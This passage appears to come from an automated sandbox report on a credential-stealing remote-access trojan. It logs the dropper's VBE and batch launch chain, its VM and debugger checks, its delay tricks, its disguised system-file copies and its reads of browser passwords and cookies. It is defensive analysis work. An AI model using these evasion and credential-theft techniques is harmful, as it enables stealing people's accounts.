                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595578Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595468Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595359Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595249Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595140Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595028Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594922Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594797Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594678Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594547Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594429Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594309Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594184Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593781Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593638Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593523Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593406Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593297Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593163Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593046Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592902Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592787Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592656Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592546Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592437Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592328Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592219Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592094Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591984Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591875Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591762Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591562Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591225Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591083Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: zHoCQG8Zet.16.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: discord.comVMware20,11696494690f
                                    Source: zHoCQG8Zet.16.drBinary or memory string: AMC password management pageVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: outlook.office.comVMware20,11696494690s
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                                    Source: zHoCQG8Zet.16.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                                    Source: zHoCQG8Zet.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                                    Source: zHoCQG8Zet.16.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                                    Source: zHoCQG8Zet.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                                    Source: zHoCQG8Zet.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                                    Source: w32tm.exe, 00000024.00000002.1810452221.00000259CB3F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                                    Source: AgentMonitor.exe, 00000006.00000002.1767367913.000000001BDE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2691954450.000000001BA60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                                    Source: zHoCQG8Zet.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                                    Source: zHoCQG8Zet.16.drBinary or memory string: tasks.office.comVMware20,11696494690o
                                    Source: wscript.exe, 00000002.00000003.1707823048.00000000032A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~Y
                                    Source: AgentMonitor.exe, 00000006.00000002.1767592476.000000001BE59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}92
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                                    Source: zHoCQG8Zet.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                                    Source: Internal.exe, 00000001.00000002.1430405322.0000000002DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: AgentMonitor.exe, 00000006.00000002.1767536504.000000001BE22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                                    Source: Internal.exe, Internal.exe, 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                                    Source: zHoCQG8Zet.16.drBinary or memory string: dev.azure.comVMware20,11696494690j
                                    Source: zHoCQG8Zet.16.drBinary or memory string: global block list test formVMware20,11696494690
                                    Source: wscript.exe, 00000002.00000003.1707823048.00000000032A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&+
                                    Source: Internal.exe, Internal.exe, 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                                    Source: zHoCQG8Zet.16.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                                    Source: Internal.exe, 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                                    Source: zHoCQG8Zet.16.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                                    Source: C:\Users\user\Desktop\Internal.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    Source: C:\Users\user\Desktop\Internal.exe - Thread information set: HideFromDebugger
                                    Source: C:\Users\user\Desktop\Internal.exe - Open window title or class name: ollydbg
                                    Source: C:\Users\user\Desktop\Internal.exe - File opened: SIWDEBUG
                                    Source: C:\Users\user\Desktop\Internal.exe - File opened: NTICE
                                    Source: C:\Users\user\Desktop\Internal.exe - File opened: SICE
                                    Source: C:\Users\user\Desktop\Internal.exe - Code function: 1_2_00517DEE mov eax, dword ptr fs:[00000030h] 1_2_00517DEE
                                    Source: C:\Users\user\Desktop\Internal.exe - Code function: 1_2_04AE606B mov eax, dword ptr fs:[00000030h] 1_2_04AE606B
                                    Source: C:\Users\user\Desktop\Internal.exe - Code function: 1_2_04AE6390 mov eax, dword ptr fs:[00000030h] 1_2_04AE6390
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Process token adjusted: Debug
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - Process token adjusted: Debug
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - Process token adjusted: Debug
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Process token adjusted: Debug
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Process token adjusted: Debug
                                    Source: C:\Recovery\csrss.exe - Process token adjusted: Debug
                                    Source: C:\Recovery\csrss.exe - Process token adjusted: Debug
                                    Source: C:\Blockcomcrt\WmiPrvSE.exe - Process token adjusted: Debug
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Memory allocated: page read and write | page guard
                                    Source: C:\Users\user\Desktop\Internal.exe - Code function: 1_2_0050B7E0 __EH_prolog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,_swprintf,_swprintf,ShellExecuteExW,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW, 1_2_0050B7E0
                                    Source: C:\Users\user\Desktop\Internal.exe - Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe - Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Blockcomcrt\AgentMonitor.exe "C:\Blockcomcrt/AgentMonitor.exe"
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP"
                                    Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exe - Process created: C:\Blockcomcrt\WmiPrvSE.exe "C:\Blockcomcrt\WmiPrvSE.exe"
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.000000000359F000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\Internal.exe - Code function: 1_2_0050F654 cpuid 1_2_0050F654
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Queries volume information: C:\Blockcomcrt\AgentMonitor.exe VolumeInformation
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - Queries volume information: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - Queries volume information: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exe - Queries volume information: C:\ VolumeInformation
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Queries volume information: C:\Blockcomcrt\AgentMonitor.exe VolumeInformation
                                    Source: C:\Blockcomcrt\AgentMonitor.exe - Queries volume information: C:\Blockcomcrt\AgentMonitor.exe VolumeInformation
                                    Source: C:\Recovery\csrss.exe - Queries volume information: C:\Recovery\csrss.exe VolumeInformation
                                    Source: C:\Recovery\csrss.exe - Queries volume information: C:\Recovery\csrss.exe VolumeInformation
                                    Source: C:\Blockcomcrt\WmiPrvSE.exe - Queries volume information: C:\Blockcomcrt\WmiPrvSE.exe VolumeInformation
                                    Source: C:\Windows\SysWOW64\wscript.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara match - File source: 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000006.00000002.1763759179.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: Process Memory Space: AgentMonitor.exe PID: 2300, type: MEMORYSTR
                                    Source: Yara match - File source: Process Memory Space: yxeaYbTPMzNPCanFqSswYWhX.exe PID: 4536, type: MEMORYSTR
                                    Source: Yara match - File source: Process Memory Space: yxeaYbTPMzNPCanFqSswYWhX.exe PID: 4788, type: MEMORYSTR
                                    Source: Yara match - File source: Internal.exe, type: SAMPLE
                                    Source: Yara match - File source: 1.3.Internal.exe.793f2eb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 1.3.Internal.exe.6f482eb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 6.0.AgentMonitor.exe.830000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 1.3.Internal.exe.793f2eb.1.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 1.3.Internal.exe.6f482eb.0.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 00000006.00000000.1708671234.0000000000832000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000001.00000003.1412731329.0000000007801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000001.00000003.1412020893.0000000006E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, type: DROPPED
                                    Source: Yara match - File source: C:\Blockcomcrt\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara match - File source: C:\Recovery\csrss.exe, type: DROPPED
                                    Source: Yara match - File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, type: DROPPED
                                    Source: Yara match - File source: C:\Blockcomcrt\AgentMonitor.exe, type: DROPPED
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal

                                    Remote Access Functionality

                                    Source: Yara match - File source: 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000006.00000002.1763759179.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: Process Memory Space: AgentMonitor.exe PID: 2300, type: MEMORYSTR
                                    Source: Yara match - File source: Process Memory Space: yxeaYbTPMzNPCanFqSswYWhX.exe PID: 4536, type: MEMORYSTR
                                    Source: Yara match - File source: Process Memory Space: yxeaYbTPMzNPCanFqSswYWhX.exe PID: 4788, type: MEMORYSTR
                                    Source: Yara match - File source: Internal.exe, type: SAMPLE
                                    Source: Yara match - File source: 1.3.Internal.exe.793f2eb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 1.3.Internal.exe.6f482eb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 6.0.AgentMonitor.exe.830000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 1.3.Internal.exe.793f2eb.1.unpack, type: UNPACKEDPE
                                    Source: Yara match - File source: 1.3.Internal.exe.6f482eb.0.unpack, type: UNPACKEDPE
